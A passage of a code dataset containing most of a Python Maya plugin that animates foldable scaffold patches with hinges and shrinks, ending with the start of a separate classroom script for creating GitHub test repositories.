getObjectTransformFromDag(shape).rotatePivot(OpenMaya.MSpace.kWorld)\r\n patchPivots.append(pivot)\r\n print(\"Pivot: {:.6f}, {:.6f}, {:.6f}\".format(pivot[0], pivot[1], pivot[2]))\r\n return patchPivots\r\n\r\n def findClosestMidpointsOnPatches(self, patchPivots: List[OpenMaya.MPoint], shapeTraverseOrder: List[str]) -> (\r\n List[List], List[float]):\r\n closestVertices = []\r\n midPoints = []\r\n for i in range(0, len(shapeTraverseOrder) - 1):\r\n # For each parent patch, get their vertices.\r\n shape = shapeTraverseOrder[i]\r\n child = shapeTraverseOrder[i + 1]\r\n\r\n bottomVertices = getObjectVerticeNamesAndPositions(shape)\r\n\r\n childPivot = patchPivots[i + 1]\r\n\r\n # find two vertices that are closest to childPivot. 
Print their name, location, and distance.\r\n vertId = len(closestVertices)\r\n currentClosest = getClosestVertices(bottomVertices, childPivot, 2)\r\n closestVertices.append(currentClosest)\r\n print(\"Closest Vertices: {}, dist: {:.6f}, {:.6f}, {:.6f}, {:.6f}\".format(closestVertices[vertId][0][0],\r\n closestVertices[vertId][0][1],\r\n closestVertices[vertId][0][2][0],\r\n closestVertices[vertId][0][2][1],\r\n closestVertices[vertId][0][2][2]))\r\n print(\"Closest Vertices: {}, dist: {:.6f}, {:.6f}, {:.6f}, {:.6f}\".format(closestVertices[vertId][1][0],\r\n closestVertices[vertId][1][1],\r\n closestVertices[vertId][1][2][0],\r\n closestVertices[vertId][1][2][1],\r\n closestVertices[vertId][1][2][2]))\r\n\r\n # Get the middle point between the two vertices.\r\n verticeDist = closestVertices[vertId][0][2] + closestVertices[vertId][1][2]\r\n print(\"Vertice Dist: {:.6f}, {:.6f}, {:.6f}\".format(verticeDist[0], verticeDist[1], verticeDist[2]))\r\n middlePoint = (verticeDist * 0.5)\r\n print(\"Middle Point: {:.6f}, {:.6f}, {:.6f}\".format(middlePoint[0], middlePoint[1], middlePoint[2]))\r\n\r\n midPoints.append(middlePoint)\r\n\r\n # Ensure the parent and child are actually connected\r\n # TODO: generalize to T scaffolds as well\r\n if (i == len(shapeTraverseOrder) - 2):\r\n # TODO: generalize to the one without the error\r\n print(\"Checking connectivity Top Base findClosestMidpointsOnPatches 501...\")\r\n print(\"TOP BASE PATCH: \", child)\r\n print(\"CURRENT PATCH: \", shape)\r\n checkScaffoldConnectionTopBase(currentClosest, child)\r\n else:\r\n print(\"Checking regular connectivity findClosestMidpointsOnPatches 504...\")\r\n checkScaffoldConnection(childPivot, middlePoint)\r\n\r\n return closestVertices, midPoints\r\n\r\n # TODO: might be a member function of basic scaff\r\n def rotatePatches(self, angle: float, rotAxis: List[float], shapeTraverseOrder: List[str], isLeft: bool) -> List[\r\n OpenMaya.MFnTransform]:\r\n patchTransforms = []\r\n if (isLeft):\r\n angle = -angle\r\n\r\n for i in range(0, len(shapeTraverseOrder)):\r\n shape = shapeTraverseOrder[i]\r\n pTransform = getObjectTransformFromDag(shape)\r\n patchTransforms.append(pTransform)\r\n if (i == len(shapeTraverseOrder) - 1): # TODO: fix this bc it won't work for T scaffolds\r\n break\r\n\r\n q = OpenMaya.MQuaternion(math.radians(angle), OpenMaya.MVector(rotAxis[0], rotAxis[1], rotAxis[2]))\r\n pTransform.rotateBy(q, OpenMaya.MSpace.kTransform)\r\n\r\n angle = -angle\r\n return patchTransforms\r\n\r\n def updatePatchTranslations(self, closestVertices: List, midPoints: List, patchPivots: List, patchTransforms: List,\r\n shapeTraverseOrder: List[str]):\r\n # Get the new closest vertices without changing the original closest vertices\r\n newClosestVertices = closestVertices.copy()\r\n for i in range(0, len(patchPivots) - 1):\r\n # Obtain child pivot so we can use it later for translation\r\n childPivot = patchPivots[i + 1]\r\n for j in range(0, len(newClosestVertices[\r\n i])): # index and use information from updated vertex positions. 
There should only be 2 verts here\r\n vertex_name, dist, vertexPoint = newClosestVertices[i][j]\r\n\r\n # Get the world position of the vertex and convert it to an MVector\r\n vertexPoint = cmds.pointPosition(vertex_name, world=True)\r\n vertexPoint = OpenMaya.MVector(vertexPoint[0], vertexPoint[1], vertexPoint[2])\r\n\r\n newClosestVertices[i][j] = (\r\n vertex_name, 0, # not sure if dist is important anymore\r\n vertexPoint)\r\n\r\n # Print new location and distance.\r\n print(\"Closest Vertices: {}, dist: {:.6f}, {:.6f}, {:.6f}, {:.6f}\".format(newClosestVertices[i][j][0],\r\n newClosestVertices[i][j][1],\r\n newClosestVertices[i][j][2][\r\n 0],\r\n newClosestVertices[i][j][2][\r\n 1],\r\n newClosestVertices[i][j][2][\r\n 2]))\r\n\r\n # Midpoint formula to solve for the midpoint betwen the two closest vertices.\r\n verticeDistNew = newClosestVertices[i][0][2] + newClosestVertices[i][1][2]\r\n middlePointNew = (verticeDistNew * 0.5)\r\n print(\r\n \"Middle Point: {:.6f}, {:.6f}, {:.6f}\".format(middlePointNew[0], middlePointNew[1], middlePointNew[2]))\r\n\r\n # Get the translation from the old middle point to the new middle point.\r\n ogMidPoint = midPoints[i]\r\n translation = middlePointNew - ogMidPoint\r\n print(\"Middle point translation: {:.6f}, {:.6f}, {:.6f}\".format(translation[0], translation[1],\r\n translation[2]))\r\n\r\n # Translate child patch by the translation.\r\n print(\"Translating child patch: \" + shapeTraverseOrder[i + 1])\r\n childPatchTransform = patchTransforms[i + 1]\r\n print(\"Translation: {:.6f}, {:.6f}, {:.6f}\".format(translation[0], translation[1], translation[2]))\r\n childPatchTransform.translateBy(translation, OpenMaya.MSpace.kWorld)\r\n\r\n def genBestFoldOption(self):\r\n # Return the hard coded object from foldManager for now\r\n print(\"Generate Best fold Option... TODO: implement me!\")\r\n # patchVertices = self.getAllPatchVertices()\r\n # patchVertices = np.array(patchVertices)\r\n #\r\n # # TODO: get its own best fold option\r\n # self.foldManager = fold.FoldManager()\r\n # self.foldManager.generate_h_basic_scaff(patchVertices[0], patchVertices[1], patchVertices[2])\r\n #\r\n # self.foldManagerOption = self.foldManager.mainFold(self.maxHinges, self.shrinks)\r\n\r\n # Splits the foldTest function into two parts.\r\n def foldKeyframe(self, time, shapeTraverseOrder: List[str], foldSolution: fold.FoldOption, recreatePatches: bool, startTime: int, endTime: int):\r\n # Get the relevant information from the fold_solution\r\n startAngles = foldSolution.fold_transform.startAngles\r\n endAngles = foldSolution.fold_transform.endAngles\r\n\r\n isLeft = foldSolution.isleft\r\n\r\n # Hinge variables\r\n numHinges = foldSolution.modification.num_hinges\r\n\r\n # Shrinking variables\r\n startPiece = foldSolution.modification.range_start\r\n endPiece = foldSolution.modification.range_end # non inclusive\r\n numPieces = foldSolution.modification.num_pieces\r\n\r\n t = time # dictate that the end time is 90 frames hard coded for now\r\n\r\n print(\"local time: \" + str(t))\r\n\r\n # TODO: make more generic in the future\r\n rotAxis = (0, 0, 1)\r\n\r\n # Update the list of shape_traverse_order to include the new patches where the old patch was\r\n if (recreatePatches and numHinges > 0):\r\n print(\"about to break patches... number of hinges... \" + str(numHinges))\r\n self.breakPatches(shapeTraverseOrder, numHinges)\r\n\r\n # TODO: let author dictate end time.. 
but this doesn't realy matter.\r\n # TODO: THIS FORMULA DOES NOT WORK\r\n # angle = t * (endAngles[0] - startAngles[0]) / (endTime - startTime) # The angle we fold at this particular time is time / 90 *\r\n\r\n # Moved from the recreate_patches condition because we always want this to be visible if no hinges\r\n # TODO: ventually move this to a better place\r\n if (numHinges == 0):\r\n # set middle patch to be visible\r\n cmds.setAttr(shapeTraverseOrder[0] + \".visibility\", 1)\r\n\r\n # Loop through the patches and get all of their pivots.\r\n patchPivots = self.getPatchPivots(shapeTraverseOrder)\r\n\r\n # Find the closest vertices to the patch pivots and calculate the midPoints, also check scaff is connected\r\n closestVertices, midPoints = self.findClosestMidpointsOnPatches(patchPivots, shapeTraverseOrder)\r\n\r\n # Rotation logic\r\n print(\"startTime: \" + str(startTime))\r\n print(\"endTime: \" + str(endTime))\r\n print(\"time: \" + str(t))\r\n if (endTime > t >= startTime):\r\n targetPatchHeight = (endTime - t) / (endTime - startTime) * self.origFoldPatchHeight\r\n print(\"targetPatchHeight: \" + str(targetPatchHeight))\r\n\r\n rightTriangleHeight = targetPatchHeight / (numHinges + 1)\r\n rightTriangleHypotenuse = self.origFoldPatchHeight / (numHinges + 1)\r\n\r\n asin = math.asin(rightTriangleHeight / rightTriangleHypotenuse)\r\n print(\"arcsin: \" + str(asin) + \" radians\")\r\n angle = endAngles[0] - math.degrees(asin)\r\n\r\n print(\"angle: \" + str(angle))\r\n elif (t < startTime):\r\n # do not rotate\r\n # TODO: see if there's a better way to do this\r\n angle = startAngles[0]\r\n else:\r\n # if t >= endTime\r\n angle = endAngles[0]\r\n\r\n # Perform rotations at once, but do not rotate the last patch\r\n patchTransforms = self.rotatePatches(angle, rotAxis, shapeTraverseOrder, isLeft)\r\n\r\n # Update location of closest vertices after rotation and update children translations\r\n self.updatePatchTranslations(closestVertices, midPoints, patchPivots, patchTransforms, shapeTraverseOrder)\r\n\r\n # Has to go at the end or something otherwise you'll get a space between top patch and the folds\r\n self.shrinkPatch(shapeTraverseOrder, endPiece, numPieces, startPiece)\r\n\r\n # Fold test for non hard coded transforms: Part 1 of the logic from foldTest, calls foldKeyframe()\r\n # AT this point should already have the best fold option\r\n def foldGeneric(self, time: int, recreatePatches: bool):\r\n # foldOption = self.basicScaffold.fold_options[0]\r\n foldOption = self.foldManagerOption\r\n startTime = foldOption.fold_transform.startTime\r\n endTime = foldOption.fold_transform.endTime\r\n\r\n # If folding for this scaff hasn't started yet, don't do anything\r\n # if (time >= startTime):\r\n # if (time >= endTime):\r\n # Cap animation at endTime\r\n # TODO: might make it so that it doesn't even translate after endTime but not sure.\r\n # time = endTime - 1\r\n\r\n self.inInitialPatches = self.getPatchesIncludeBase()\r\n\r\n if (len(self.shapeTraverseOrder) == 0 or recreatePatches):\r\n self.restoreInitialState()\r\n\r\n else:\r\n # Reset the scene\r\n # TODO; Might not work anymore in a bit\r\n self.setUpGenericScene(self.shapeTraverseOrder, self.shapeBase)\r\n\r\n # Call the keyframe funtion but with the LOCAL TIME rather than the current global time\r\n # localTime = time - startTime\r\n # TODO: get rid of these params since some of them are just member vars\r\n self.foldKeyframe(time, self.shapeTraverseOrder, foldOption, recreatePatches, startTime, endTime)\r\n\r\n\r\nclass 
MayaInputScaffoldWrapper():\r\n def __init__(self, patches: List[str], pushAxis: OpenMaya.MVector, nH: int, nS: int):\r\n self.pushAxis = pushAxis\r\n self.patches = patches\r\n self.bases = []\r\n self.foldables = []\r\n self.edges = []\r\n self.maxHinges = nH\r\n self.shrinks = nS\r\n\r\n self.inputScaffold = None\r\n self.basicScaffolds: List[MayaHBasicScaffoldWrapper] = []\r\n\r\n def getPatches(self) -> List[str]:\r\n return self.patches\r\n\r\n def genConnectivityInfo(self):\r\n # Test each patch for connectivity to other patches\r\n # First, only get the patches that are normal to the pushing direction, called base patches\r\n # For each base patch, test for connectivity against all other patches (foldable patches)\r\n # If they are close enough to each other via check-scaffold connectivity, then add an edge between them in the form of\r\n # [base_patch, foldable_patch]\r\n\r\n for patch in self.patches:\r\n # Get the surface normal of the patch in world space\r\n # print(\"getting surface normal for {}\".format(patch))\r\n planeDagPath = getObjectObjectFromDag(patch)\r\n fnMesh = OpenMaya.MFnMesh(planeDagPath)\r\n\r\n # Get the normal of the plane's first face (face index 0)\r\n # Note: If the plane has multiple faces, specify the desired face index\r\n normal = OpenMaya.MVector()\r\n # Note: the output normal is the SECOND argument to this function\r\n fnMesh.getPolygonNormal(0, normal, OpenMaya.MSpace.kWorld)\r\n\r\n # print(\"normal: {:.6f}, {:.6f}, {:.6f}\".format(normal[0],\r\n # normal[1],\r\n # normal[2]))\r\n\r\n # Get the dot product of normal and pushDir\r\n dot = self.pushAxis * normal\r\n if (abs(abs(dot) - 1) < 0.0001):\r\n # Parallel\r\n self.bases.append(patch)\r\n else:\r\n self.foldables.append(patch)\r\n\r\n edges = []\r\n\r\n # For every base in basePatches, test for connectivity with every foldable_patch\r\n for base in self.bases:\r\n for foldpatch in self.foldables:\r\n # Since this is at the very beginning, checkScaffoldConnection should work as is\r\n # Find pivot of base\r\n pivot = getObjectTransformFromDag(base).rotatePivot(OpenMaya.MSpace.kWorld)\r\n\r\n # find the closest vertices from fold to pivot\r\n vertices = getObjectVerticeNamesAndPositions(foldpatch)\r\n closestVertices = getClosestVertices(vertices, pivot, 2)\r\n\r\n # Check if the middle point is close enough to the pivot\r\n middlePoint = (closestVertices[0][2] + closestVertices[1][2]) / 2\r\n\r\n # TODO: might get scaffolds where they're not connected like this...\r\n print(\"Checking connectivity genConnectivityInfo 742\")\r\n status = checkScaffoldConnectionBaseNoErr(base, closestVertices)\r\n # status = checkScaffoldConnectionNoErr(pivot, middlePoint)\r\n if status:\r\n edges.append([base, foldpatch])\r\n\r\n print(\"Edges:\")\r\n print(edges)\r\n\r\n self.edges = edges\r\n\r\n def cleanUpSplitPatches(self):\r\n print(\"InputScaff: cleaning up split patches...\")\r\n for bScaff in self.basicScaffolds:\r\n bScaff.cleanUpSplitPatches()\r\n\r\n def genInputScaffold(self):\r\n # TODO: not super important yet\r\n print(\"genInputScaffold: Implement me!\")\r\n\r\n def genBasicScaffolds(self):\r\n print(\"Generating Basic Scaffolds...\")\r\n\r\n # Create a dictionary where the key is the foldablePatch and the values are the patches it is connected to\r\n if (len(self.edges) == 0):\r\n print(\"Error! 
No edges, yet genBasicScaffolds is called!\")\r\n exit(1)\r\n\r\n foldPatchDiction = {}\r\n for edge in self.edges:\r\n if edge[1] not in foldPatchDiction:\r\n foldPatchDiction[edge[1]] = [edge[0]]\r\n else:\r\n foldPatchDiction[edge[1]].append(edge[0])\r\n\r\n # For each entry in foldPatchDiction, create a basic scaffold\r\n for foldPatch in foldPatchDiction:\r\n print(\"BASIC SCAFFOLD CREATION...\")\r\n # Create a basic scaffold with the foldPatch and the base patches it is connected to\r\n\r\n # If the pushAxis is positive, then the basePatch with the lower value in that axis is basePatch\r\n # If the pushAxis is negative, then the basePatch with the higher value in that axis is basePatch\r\n basePatch0 = foldPatchDiction[foldPatch][0]\r\n basePatch1 = foldPatchDiction[foldPatch][1]\r\n\r\n # should be a list of 3 items\r\n basePatch0Vertices = list(getObjectVerticeNamesAndPositions(basePatch0).values())\r\n basePatch1Vertices = list(getObjectVerticeNamesAndPositions(basePatch1).values())\r\n\r\n print(\"basePatch0Vertices: {}\".format(basePatch0Vertices))\r\n print(\"basePatch1Vertices: {}\".format(basePatch1Vertices))\r\n\r\n # TODO: hard coded to be Y axis for now so y axis cannot be 0\r\n basePatch = None\r\n topPatch = None\r\n if self.pushAxis[1] > 0:\r\n if basePatch0Vertices[0][1] < basePatch1Vertices[0][1]:\r\n topPatch = basePatch0\r\n basePatch = basePatch1\r\n else:\r\n topPatch = basePatch1\r\n basePatch = basePatch0\r\n else:\r\n if basePatch0Vertices[0][1] > basePatch1Vertices[0][1]:\r\n topPatch = basePatch0\r\n basePatch = basePatch1\r\n else:\r\n topPatch = basePatch1\r\n basePatch = basePatch0\r\n\r\n print(\"Generate basic scaffold...\")\r\n print(\"my Base Patch: {}\".format(basePatch))\r\n print(\"my Fold Patch: {}\".format(foldPatch))\r\n print(\"my Top Patch: {}\".format(topPatch))\r\n\r\n patchList = [foldPatch, topPatch]\r\n basicScaff = MayaHBasicScaffoldWrapper(basePatch, patchList, self.pushAxis, self.maxHinges, self.shrinks)\r\n self.basicScaffolds.append(basicScaff)\r\n\r\n def genFoldSolutions(self):\r\n # TODO: not super important yet\r\n # Call genFoldSolution of the input scaffold, which will hopefully populate each basic scaffold with a solution and the time interval of the solution\r\n print(\"TODO: genFoldSolutions... 
implement me!\")\r\n # raise Exception(\"ERROR: GenFoldSolutions not implemented\")\r\n\r\n # TODO: comment this back eventually\r\n # for bScaff in self.basicScaffolds:\r\n # bScaff.genBestFoldOption()\r\n\r\n # TODO: manually set fold option rather than generate them for now\r\n\r\n # FOLD OPTION 1\r\n # fm1 = fold.FoldManager()\r\n #\r\n # alpha = 0.5\r\n # cost1 = 3 # dummy card coded value\r\n # mod1 = fold.Modification(0, 0, 1, 1, cost1)\r\n # patchList1 = np.array(self.basicScaffolds[0].getAllPatchVertices())\r\n #\r\n # fm1.generate_h_basic_scaff(patchList1[0], patchList1[1], patchList1[2])\r\n # patchObjList = [fm1.h_basic_scaff.b_patch, fm1.h_basic_scaff.f_patch, fm1.h_basic_scaff.b_patch_high]\r\n # fo1 = fold.FoldOption(True, mod1, patchObjList)\r\n # fo1.gen_fold_transform()\r\n # fo1.fold_transform.startTime = 0\r\n # fo1.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[0].foldManagerOption = fo1\r\n #\r\n # # FOLD OPTION 2\r\n # fm2 = fold.FoldManager()\r\n #\r\n # mod2 = fold.Modification(0, 0, 1, 2, cost1)\r\n # patchList2 = np.array(self.basicScaffolds[1].getAllPatchVertices())\r\n #\r\n # fm2.generate_h_basic_scaff(patchList2[0], patchList2[1], patchList2[2])\r\n # patchObjList2 = [fm2.h_basic_scaff.b_patch, fm2.h_basic_scaff.f_patch, fm2.h_basic_scaff.b_patch_high]\r\n # fo2 = fold.FoldOption(True, mod2, patchObjList2)\r\n # fo2.gen_fold_transform()\r\n # fo2.fold_transform.startTime = 0\r\n # fo2.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[1].foldManagerOption = fo2\r\n\r\n # FOLD OPTION 3\r\n\r\n # TODO: note that I've flipped the order they go in\r\n # FOLD OPTION 3\r\n fm1 = fold.FoldManager()\r\n cost1 = 3 # dummy card coded value\r\n mod1 = fold.Modification(1, 0, 1, 1, cost1)\r\n patchList1 = np.array(self.basicScaffolds[2].getAllPatchVertices())\r\n\r\n fm1.generate_h_basic_scaff(patchList1[0], patchList1[1], patchList1[2])\r\n patchObjList = [fm1.h_basic_scaff.b_patch, fm1.h_basic_scaff.f_patch, fm1.h_basic_scaff.b_patch_high]\r\n fo1 = fold.FoldOption(True, mod1, patchObjList)\r\n fo1.gen_fold_transform()\r\n fo1.fold_transform.startTime = 0\r\n fo1.fold_transform.endTime = 90\r\n\r\n self.basicScaffolds[2].foldManagerOption = fo1\r\n\r\n # FOLD OPTION 2\r\n fm2 = fold.FoldManager()\r\n mod2 = fold.Modification(3, 0, 1, 1, cost1)\r\n patchList2 = np.array(self.basicScaffolds[1].getAllPatchVertices())\r\n\r\n fm2.generate_h_basic_scaff(patchList2[0], patchList2[1], patchList2[2])\r\n patchObjList2 = [fm2.h_basic_scaff.b_patch, fm2.h_basic_scaff.f_patch, fm2.h_basic_scaff.b_patch_high]\r\n fo2 = fold.FoldOption(True, mod2, patchObjList2)\r\n fo2.gen_fold_transform()\r\n fo2.fold_transform.startTime = 0\r\n fo2.fold_transform.endTime = 180\r\n\r\n self.basicScaffolds[1].foldManagerOption = fo2\r\n\r\n # FOLD OPTION 1\r\n fm3 = fold.FoldManager()\r\n cost1 = 2\r\n mod3 = fold.Modification(1, 0, 1, 1, cost1)\r\n patchList3 = np.array(self.basicScaffolds[0].getAllPatchVertices())\r\n\r\n fm3.generate_h_basic_scaff(patchList3[0], patchList3[1], patchList3[2])\r\n patchObjList3 = [fm3.h_basic_scaff.b_patch, fm3.h_basic_scaff.f_patch, fm3.h_basic_scaff.b_patch_high]\r\n fo3 = fold.FoldOption(True, mod3, patchObjList3)\r\n fo3.gen_fold_transform()\r\n fo3.fold_transform.startTime = 90\r\n fo3.fold_transform.endTime = 180\r\n\r\n self.basicScaffolds[0].foldManagerOption = fo3\r\n\r\n # fm1 = fold.FoldManager()\r\n # cost1 = 3 # dummy card coded value\r\n # mod1 = fold.Modification(1, 0, 1, 1, cost1)\r\n # patchList1 = 
np.array(self.basicScaffolds[0].getAllPatchVertices())\r\n #\r\n # fm1.generate_h_basic_scaff(patchList1[0], patchList1[1], patchList1[2])\r\n # patchObjList = [fm1.h_basic_scaff.b_patch, fm1.h_basic_scaff.f_patch, fm1.h_basic_scaff.b_patch_high]\r\n # fo1 = fold.FoldOption(True, mod1, patchObjList)\r\n # fo1.gen_fold_transform()\r\n # fo1.fold_transform.startTime = 0\r\n # fo1.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[0].foldManagerOption = fo1\r\n #\r\n # # FOLD OPTION 2\r\n # fm2 = fold.FoldManager()\r\n # mod2 = fold.Modification(3, 0, 1, 1, cost1)\r\n # patchList2 = np.array(self.basicScaffolds[1].getAllPatchVertices())\r\n #\r\n # fm2.generate_h_basic_scaff(patchList2[0], patchList2[1], patchList2[2])\r\n # patchObjList2 = [fm2.h_basic_scaff.b_patch, fm2.h_basic_scaff.f_patch, fm2.h_basic_scaff.b_patch_high]\r\n # fo2 = fold.FoldOption(True, mod2, patchObjList2)\r\n # fo2.gen_fold_transform()\r\n # fo2.fold_transform.startTime = 0\r\n # fo2.fold_transform.endTime = 90\r\n #\r\n # self.basicScaffolds[1].foldManagerOption = fo2\r\n\r\n def fold(self, time, recreatePatches):\r\n # Given that we have each basic scaffold with a solution, take in the current time and see the fold status of each basic scaffold.\r\n # For each basic scaffold, if the solution's startTime is less than the current time, then fold it with some animations\r\n # TODO: need to later figure out how to do this with mid level scaffolds first\r\n # TODO: assume list of basic scaffolds is not sorted in any way\r\n print(\"folding...\")\r\n for bScaff in self.basicScaffolds:\r\n bScaff.foldGeneric(time, recreatePatches)\r\n\r\n\r\n# Node definition\r\nclass foldableNode(OpenMayaMPx.MPxNode):\r\n # Declare class variables:\r\n # TODO:: declare the input and output class variables\r\n # i.e. inNumPoints = OpenMaya.MObject()\r\n\r\n # duration of movement\r\n inTime = OpenMaya.MObject()\r\n\r\n # number of hinges\r\n inNumHinges = OpenMaya.MObject()\r\n\r\n # maximum number of shrinks\r\n inNumShrinks = OpenMaya.MObject()\r\n\r\n # inStringList = OpenMaya.MObject() # TODO make into inInitialpatches\r\n\r\n # Dummy output plug that can be connected to the input of an instancer node\r\n # so our node can \"live\" somewhere.\r\n outPoint = OpenMaya.MObject()\r\n\r\n # basicScaffolds: List[MayaHBasicScaffold] = []\r\n\r\n # TODO: later on we will iterate through basicScaffolds instead\r\n # defaultScaff: MayaHBasicScaffold = None\r\n defaultInputScaffWrapper: MayaInputScaffoldWrapper = None\r\n\r\n # shapeTraverseOrder: List[str] = []\r\n # shapeBase = []\r\n # shapeResetTransforms = {}\r\n\r\n new_shapes = []\r\n\r\n prevNumHinges = -1\r\n prevShrinks = -1\r\n prevPushAxis = [-1, -1, -1] # TODO: make more generic\r\n\r\n # constructor\r\n def __init__(self):\r\n OpenMayaMPx.MPxNode.__init__(self)\r\n\r\n # compute\r\n def compute(self, plug, data):\r\n # Print the MDGContext\r\n context = data.context().isNormal()\r\n\r\n if (context == False):\r\n print(\"Context is not normal, returning\")\r\n return\r\n\r\n # TODO:: create the main functionality of the node. Your node should\r\n # take in three floats for max position (X,Y,Z), three floats\r\n # for min position (X,Y,Z), and the number of random points to\r\n # be generated. Your node should output an MFnArrayAttrsData\r\n # object containing the random points. 
Consult the homework\r\n # sheet for how to deal with creating the MFnArrayAttrsData.\r\n\r\n timeData = data.inputValue(self.inTime)\r\n time = timeData.asInt()\r\n\r\n numHingeData = data.inputValue(self.inNumHinges)\r\n numHinges = numHingeData.asInt()\r\n\r\n numShrinksData = data.inputValue(self.inNumShrinks) # TODO: Represents maximum allowed shrinks\r\n numShrinks = numShrinksData.asInt()\r\n\r\n # hardcode patches for now for an input scaffold which contains some mid level scaffolds in arbitrary order\r\n # patches = [\"cBase\", \"cFold\", \"cFold1\", \"cTop\", \"cFold2\", \"cTop1\", \"cFold3\", \"cFold4\", \"cTop2\"]\r\n # patches = [\"pBaseBottomH\", \"pFoldH\", \"pBaseTopH\"]\r\n # patches = [\"mBase\", \"mFold1\", \"mFold2\", \"mTop\", \"mFold3\", \"mTop1\"]\r\n # patches = [\"dBase\", \"dFold1\", \"dFold2\", \"dTop\"]\r\n patches = [\"gBase\", \"gFold1\", \"gFold2\", \"gBase1\", \"gFold3\", \"gBase2\"]\r\n # patches = [\"lBase\", \"lFold\", \"lBase1\"]\r\n\r\n # b1Patches = [\"mBase\", \"mFold1\", \"mTop\"]\r\n # b2Patches = [\"mBase\", \"mFold2\", \"mTop\"]\r\n\r\n # hard code push axis\r\n pushAxis = [0, -1, 0]\r\n\r\n recreatePatches = False\r\n # TODO: maybe only need to create a new MayaInputScaffoldWrapper if patches, pushAxis, numHinges, numShrinks have changed\r\n if (self.prevNumHinges != numHinges or self.prevShrinks != numShrinks or self.prevPushAxis != pushAxis):\r\n # Reset variables\r\n self.prevNumHinges = numHinges\r\n self.prevShrinks = numShrinks\r\n self.prevPushAxis = pushAxis\r\n\r\n # The current scaffold should clear its patches from the scene, if there is one\r\n if (self.defaultInputScaffWrapper != None):\r\n self.defaultInputScaffWrapper.cleanUpSplitPatches()\r\n\r\n # Create new MayaInputScaffoldWrapper\r\n self.defaultInputScaffWrapper = None\r\n self.defaultInputScaffWrapper = MayaInputScaffoldWrapper(patches, OpenMaya.MVector(pushAxis[0], pushAxis[1],\r\n                                                                             pushAxis[2]), numHinges,\r\n                                                                             numShrinks)\r\n self.defaultInputScaffWrapper.genConnectivityInfo()\r\n self.defaultInputScaffWrapper.genInputScaffold()\r\n self.defaultInputScaffWrapper.genBasicScaffolds()\r\n\r\n # TODO: For testing purposes, hard code solutions and don't call this yet\r\n self.defaultInputScaffWrapper.genFoldSolutions()\r\n\r\n recreatePatches = True\r\n\r\n # always perform this step regardless\r\n # TODO: figure out the foldMain.py before calling this\r\n self.defaultInputScaffWrapper.fold(time, recreatePatches)\r\n\r\n data.setClean(plug)\r\n\r\n\r\n# initializer\r\ndef nodeInitializer():\r\n tAttr = OpenMaya.MFnTypedAttribute()\r\n nAttr = OpenMaya.MFnNumericAttribute()\r\n\r\n # TODO:: initialize the input and output attributes. 
Be sure to use the\r\n # MAKE_INPUT and MAKE_OUTPUT functions\r\n\r\n try:\r\n print(\"Initialization!\\n\")\r\n foldableNode.inTime = nAttr.create(\"inTime\", \"t\", OpenMaya.MFnNumericData.kInt, 0)\r\n MAKE_INPUT(nAttr)\r\n\r\n foldableNode.inNumHinges = nAttr.create(\"numHinges\", \"nH\", OpenMaya.MFnNumericData.kInt, 3)\r\n MAKE_INPUT(nAttr)\r\n\r\n foldableNode.inNumShrinks = nAttr.create(\"numShrinks\", \"nS\", OpenMaya.MFnNumericData.kInt, 1)\r\n MAKE_INPUT(nAttr)\r\n\r\n # defaultList = OpenMaya.MFnStringArrayData().create()\r\n # foldableNode.inStringList = tAttr.create(\"initialPatches\", \"iP\", OpenMaya.MFnStringArrayData.kStringArray,\r\n # defaultList)\r\n # MAKE_INPUT(tAttr)\r\n\r\n foldableNode.outPoint = tAttr.create(\"outPoint\", \"oP\", OpenMaya.MFnArrayAttrsData.kDynArrayAttrs)\r\n MAKE_OUTPUT(tAttr)\r\n\r\n except Exception as e:\r\n print(e)\r\n sys.stderr.write((\"Failed to create attributes of %s node\\n\", kPluginNodeTypeName))\r\n\r\n try:\r\n # TODO:: add the attributes to the node and set up the\r\n # attributeAffects (addAttribute, and attributeAffects)\r\n foldableNode.addAttribute(foldableNode.inTime)\r\n foldableNode.addAttribute(foldableNode.inNumHinges)\r\n foldableNode.addAttribute(foldableNode.inNumShrinks)\r\n # foldableNode.addAttribute(foldableNode.inStringList)\r\n foldableNode.addAttribute(foldableNode.outPoint)\r\n\r\n foldableNode.attributeAffects(foldableNode.inTime, foldableNode.outPoint)\r\n foldableNode.attributeAffects(foldableNode.inNumHinges, foldableNode.outPoint)\r\n foldableNode.attributeAffects(foldableNode.inNumShrinks, foldableNode.outPoint)\r\n # foldableNode.attributeAffects(foldableNode.inStringList, foldableNode.outPoint)\r\n\r\n except Exception as e:\r\n print(e)\r\n sys.stderr.write((\"Failed to add attributes of %s node\\n\", kPluginNodeTypeName))\r\n\r\n\r\n# creator\r\ndef nodeCreator():\r\n return OpenMayaMPx.asMPxPtr(foldableNode())\r\n\r\n\r\n# initialize the script plug-in\r\ndef initializePlugin(mobject):\r\n mplugin = OpenMayaMPx.MFnPlugin(mobject)\r\n try:\r\n mplugin.registerNode(kPluginNodeTypeName, foldableNodeId, nodeCreator, nodeInitializer)\r\n except:\r\n sys.stderr.write(\"Failed to register node: %s\\n\" % kPluginNodeTypeName)\r\n\r\n # Load menu\r\n print(\"Executing Command...\\n\")\r\n OpenMaya.MGlobal.executeCommand(\"source \\\"\" + mplugin.loadPath() + \"/unhingedDialogue.mel\\\"\")\r\n\r\n\r\n# uninitialize the script plug-in\r\ndef uninitializePlugin(mobject):\r\n mplugin = OpenMayaMPx.MFnPlugin(mobject)\r\n\r\n OpenMaya.MGlobal.executeCommand(\"source \\\"\" + mplugin.loadPath() + \"/removeMenu.mel\\\"\")\r\n\r\n try:\r\n mplugin.deregisterNode(foldableNodeId)\r\n except:\r\n sys.stderr.write(\"Failed to unregister node: %s\\n\" % kPluginNodeTypeName)\r\n","repo_name":"dluisnothere/660-unhinged","sub_path":"foldableNodeV2.py","file_name":"foldableNodeV2.py","file_ext":"py","file_size_in_byte":52326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29641036592","text":"import argparse\nimport distutils.util\n\nimport github\nimport requests\nfrom colorama import Fore, Style\n\nfrom classroom_tools import github_utils\nfrom classroom_tools.verifications import repo_is_template\n\nparser = argparse.ArgumentParser('Create test repositories')\nparser.add_argument(\n '--token',\n required=True,\n help='GitHub personal access token with repo and workflow permissions'\n)\nparser.add_argument(\n '--template_repo_fullname',\n required=True,\n 
